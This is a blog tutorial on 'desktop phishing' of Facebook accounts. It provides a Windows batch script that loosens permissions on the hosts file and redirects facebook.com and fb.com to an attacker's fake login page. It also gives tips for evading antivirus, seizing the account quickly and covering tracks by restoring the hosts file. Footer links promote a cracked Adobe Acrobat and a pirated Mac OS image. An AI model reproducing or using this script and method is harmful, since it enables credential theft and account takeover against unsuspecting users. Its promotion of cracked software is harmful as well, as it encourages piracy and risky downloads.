Skip to main content

Learn hacking facebook accounts by desktop phishing

As I’ve mentioned in my previous article, in this post we will be exploring a bit of batch file programming and then will move ahead implementing that in facebook hacking by desktop phishing. The advantage here is, the victim will not be able to identify the fake page since the URL in the address looks similar to the genuine one.
This tutorial would be a non-exhaustive guide for beginners.If you have not read my previous articles “DNS Hijacking”, “Batch programming” and “Hacking facebook accounts using phishing” then I might ask you to read it before continuing reading this further, since that would give you a prerequisite knowledge upon the topics that we are going to discuss today.
Firstly, I’ll give you the batch program that I was talking about in my last post. As we have seen that, adding an IP address with a corresponding domain name in the host file would redirect you to webpage as you desire with a desired domain name.

So, we are going to take this into next level for hacking purposes. We’ll change the host file in the victim machine with the help of a batch program and redirect the victim to our fake login page. The only thing you need to consider is sending the batch program to the victim machine and running it.
Here is the batch program that can be used to manipulate the HOSTS file.
@echo off
cacls C:\Windows\System32\drivers\etc\hosts /E /P Everyone:F
cd “C:\Windows\System32\drivers\etc”
echo <ip_address>www.facebook.com >> “hosts”
echo <ip_address>www.fb.com >> “hosts”
echo <ip_address>https://www.facebook.com >> “hosts”
echo <ip_address>https://fb.com >> “hosts”
Replace the <ip_address> with the IP address of your webpage. You can obtain the IP address of your website by pinging it through Command Prompt (you can refer by previous article of DNS hijacking where I’ve already described). Remember to save this in ‘.bat’ format.
Let us now discuss what exactly the above code does. The second line of the code above takes the admin privileges over the ‘hosts’ file, so that editing can be done. Then we move into the path where the ‘hosts’ file is located and then we write 4 lines into the file. Those lines of codes are responsible for the redirection of the user. Therefore, we try to redirect all the possible combinations of facebook addresses to the IP that is provided.
Remember, executing the above code containing file in the victim’s machine is your personal concern and hence I’m not describing the methodologies of spreading your code.
Note: You can also change the .bat file into .exe file using batch to exe converter. Click the link to learn how to convert a batch file into an executable. Batch files are generally said to be safe and hence there will be no problem with the antivirus programs.
In one of my previous article 10 steps to hack facebook accounts, I’ve already described about creating a fake page and hosting it, you can follow that article from here onwards to make your own.
Now, once the code has been landed and executed in the victim’s machine he will be redirected to your fake page every time he tries to access facebook. Since the address in the address bar of the fake page remains as ‘www.facebook.com’ there is no chance of identification and hence the victim can be trapped easily.
After the user has entered the credentials the data is written into your ‘passwords.txt’ file and further redirected as mentioned in your ‘login.php’ file. At this moment the victim might come to know that he has been trapped since he was not redirected to the facebook home page and may try to change the password. Hence, you have to stay alert while you trap the victim, you will have to immediately get control over the victim’s account once you receive the password.
Further, you must take care of replacing the old hosts file with the new one without any manipulations so that the victim not get the smell of the trap!
I’ve got a lot of complaints that while trying to host a fake page on 000webhost.com their web hosting accounts are being blocked. Therefore in my next tutorial I’ll show you how to host your web page on your own computer. So, look forward and pass your comments!!!

Comments

Popular posts from this blog

JNTU-K B.Tech R10 All Results | Manabadi | Schools9 | jntuk.edu.in

Hi Friends...! It is some what difficult to search the all regular and supply results in google from manabadi, schools9 or from jntuk.edu.in for JNTU-Kakinada B.Tech students of R10 Regulation. So, that for this purpose Results Release team collected all the results and providing you to check the results of jntuk r10 regulation.  JNTU-K R10 B.Tech All Results [2010-14] JNTU-K R10 B.Tech All Results [2011-15] JNTU-K R10 B.Tech All Results [2012-16]

Adobe Acrobat XI Pro 11.0.0 Multilanguage (Cracked dll )

(Size: 530 MB) Adobe® Acrobat® XI Pro is more than just the leading PDF converter. It's packed with smart tools that give you even more power to communicate. Easily, seamlessly, brilliantly. NEW Edit text in a PDF - Fix a typo, change a font, or add a paragraph to your PDF as easily as you do in other applications using a new point-and-click interface. NEW Convert PDF files to PowerPoint - Get a head start on new projects by saving a PDF file as a fully editable PowerPoint presentation. NEW Create new PDF and web forms - Customize professional templates or design from scratch with the Adobe FormsCentral desktop app included in Acrobat XI Pro. IMPROVED Standardize routine PDF tasks - Make it easy to create PDFs consistently. Guide people through the correct series of steps with Actions. NEW Edit images in a PDF - Resize, replace, and adjust images in your PDF with no need to track down the original file or graphic.

The anatomy of anxiety

Mac OS X 10.8 Mountain Lion ISO Untouched OS download

Description I noticed that there are no complete and untouched Mountain Lion ISO images uploaded on any torrent sites. The only one available had its boot sector stripped so it could fit onto a 4.7 gb dvd. Therefore it is not bootable or very hard to boot! So here is a untouched copy of Mountain Lion in the ISO format. It will require a dual layer dvd to burn!  This iso was made by opening the golden master "InstallESD.dmg" in disk utility and converting it to a cd/dvd master. Macs use the extension ".cdr" for raw image files so I then changed it to ".iso". Now it is completely compatible to be burned with any iso image burner available! To burn on a mac in disk utility simply change the extension back to ".cdr".